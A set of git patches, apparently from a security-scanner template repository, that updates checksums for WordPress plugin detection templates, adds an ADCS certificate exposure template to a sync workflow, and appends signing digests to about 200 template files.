+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:90195b4b8ad8d8e15931bfee3babb85f962c25a7 -http/technologies/wordpress/plugins/tablepress.yaml:0cbe165ca676388474b096445e37e54c361f4dcb -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:3630dd6ce47ab060182bc9213c31f30a50a4e42c -http/technologies/wordpress/plugins/templately.yaml:566e1e14bf34de7fc9d2c82db1388eccce46a785 -http/technologies/wordpress/plugins/the-events-calendar.yaml:c24ddfa1fcd16480655d4ab2fd8993d7608b37b1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:314efd56953bc633d05b95ed46a3da405d458170 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:c9e2bcda6a930908a8b0e1d3a718dc763a8b87eb -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6945547aa955ca0aec6425c198ee1b667a79ae94 -http/technologies/wordpress/plugins/under-construction-page.yaml:7da79f1fad17b3093100a53784765b2376de8d57 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:014a52f32bd49fdddc9c08cf8f14f42072163dc9 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:7aacad35c7c94c9f6dd8abfb2bdc892593d2edfb +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e8684f8cc4b0d9954d7047d45321c499dea6c335 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:0ceeb9aaab8678e8cbcabd26bf647ccdaf6ab8f7 -http/technologies/wordpress/plugins/webp-express.yaml:7b1d0283248c2d33cf27a8a08fc0cced9474dda8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:3f3812b7289cce33c8e881482c1a2954accec760 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:00406e7fe6e654934efa2222ee487955f711f442 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:55f6da42f441f118d0adb57c8f0c97820034df16 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:22239b1a365fe46b2bef825af19e68b6fc9bc95b +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:cb91fc264d16c19c57e592d3319bd3c15dca7c0c -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:cf53845d56b1928e797c3df0fea420906938f81f -http/technologies/wordpress/plugins/woocommerce-payments.yaml:f181096bcbf58b42defd18eb23c022b2fd16635b -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:2cdcb0cd3cd52b09572fb7693dc04048af2ffb64 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:571ec1bc605b30c3c62c136c6dadbb19d2490616 -http/technologies/wordpress/plugins/woocommerce-services.yaml:2f09e9b6da616c13dca8a54fa83bc1301e7cfce5 -http/technologies/wordpress/plugins/woocommerce.yaml:0654c9c27378f176e153f634065ebecca09f804b -http/technologies/wordpress/plugins/wordfence.yaml:dda67e03fd05bb32f9a2300187209a3636c6c511 -http/technologies/wordpress/plugins/wordpress-importer.yaml:55bf8bbaeb1182b7471837c19c68b757d16fcec7 -http/technologies/wordpress/plugins/wordpress-seo.yaml:e77355999923704b75b1b7f82962f72680a4827c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:a17acbf9e46f87c541a9499ff7b622e6883c0a95 -http/technologies/wordpress/plugins/wp-crontrol.yaml:80a4f5cc8170375f7a04f10fd49a74809401b55f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:71f29be88bc81c153936755ec21ec81e600afbcf -http/technologies/wordpress/plugins/wp-file-manager.yaml:7bf2905b2ec1d8a399f618db40ccd43f0d7a8983 -http/technologies/wordpress/plugins/wp-google-maps.yaml:d6475e47fc5d9b40895dbca68d69098c2ab564d0 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:40bf467c8756ed316e5d3a139b6cd061db92d1f9 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:a875146e7ffc6014389f65bbe0831aca7ad93431 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:e9ced93a24b716980d28c06c042386e83dc0e495 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:040ba3795f80542354d312b89c01d115b0e7ead3 -http/technologies/wordpress/plugins/wp-optimize.yaml:82b19b227be1270525e7929bc2babe304eaf61a4 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:0665e3dd0eee43513627940a9c451814f6e860c5 -http/technologies/wordpress/plugins/wp-reset.yaml:c5f6e2b375ade7a6d7e65d0d9b3d6779b8f859fc -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6964d228e4b1ec1efebf5f849db73a05c2a1b93b -http/technologies/wordpress/plugins/wp-rollback.yaml:735ee4e85885b4f77398b5eca2ad1b9044764fdf -http/technologies/wordpress/plugins/wp-seopress.yaml:db2754b005ff6d27fc9f48f534ad1d00ff641d04 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:74b017e6e36fc299d4493e338382e35d34ee83d7 -http/technologies/wordpress/plugins/wp-smushit.yaml:9eabc87c7b01d0d90426c2b69b15a2d9472a3cd0 -http/technologies/wordpress/plugins/wp-statistics.yaml:7cd27ed57debb46391dad5f6e4049b4600f9ee41 -http/technologies/wordpress/plugins/wp-super-cache.yaml:326088abe0293b8c516bfc5df2e0c519e88a5359 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:dd65e2ffbdc84dbf3228d895fa22841fb76c5ff6 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:9dd6b5f1ccf8c9b3b30094e8edce9798dd1ca588 -http/technologies/wordpress/plugins/wpforms-lite.yaml:4e224ac7801d6da6b222acce6b826cf740ee3cf9 -http/technologies/wordpress/plugins/wps-hide-login.yaml:d481a817a049b08781cceb60404a6bef24fa74ab -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:50d517a09f92f7544c383104d325b0addd45536a +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:63c13bccce6608c2a1537bd233d9729f8e9e7eca +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8887,7 +8888,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:536fcf1951bbd1a468afef8485f8c2cd8d3dd2fa +templates-checksum.txt:8a6aa78697c27df1a9b49a97349ce50daf43a30b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 27408a40e92225c974d6cdb0fafa457e90ae8e0a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 17 Jul 2024 10:56:56 +0000 Subject: [PATCH 243/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e7cfe20f9be..b23226a66cb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -21,6 +21,7 @@ on: - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' + - 'http/exposures/files/adcs-certificate.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' From 84a2749594685deca0edd73dff5a1a32210a4386 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 10:57:58 +0000 Subject: [PATCH 244/247] Auto Template Signing [Wed Jul 17 10:57:58 UTC 2024] :robot: --- http/exposures/files/adcs-certificate.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/exposures/files/adcs-certificate.yaml b/http/exposures/files/adcs-certificate.yaml index 537d3676f33..9f9958360ac 100644 --- a/http/exposures/files/adcs-certificate.yaml +++ b/http/exposures/files/adcs-certificate.yaml @@ -25,3 +25,4 @@ http: - contains(body, "CertEnroll") || contains(body, "certenroll") - status_code == 200 condition: and +# digest: 4b0a00483046022100ab09f0fa5ad15180858e288d8f9faa7b3732391ceed46de0dbabb6d3c3b0e75e022100ef042bef6fdfee276767180092a43440c2de421c6a97c1d95c26a57e6a1276f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749a..7c04b2158c4 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008fc666c1ec15a39c9ce9de9649b39b963f931d967ca3ce3ffeae9187eea3f4b0022100c4f8cf8263caf29a117d07020353ff33322e803a72231a22252cafd0d4b1c6ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b632..0694ce0bf44 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad3b3a0e09f9c8df8e4d7182b19d8a4f2d1a5c98275410586275bc5cb055d153022024ea7609535c3db5b0acb942f79c6a03c41f7729113b614f942b051302dc6812:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc80..0381db4b6dd 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml 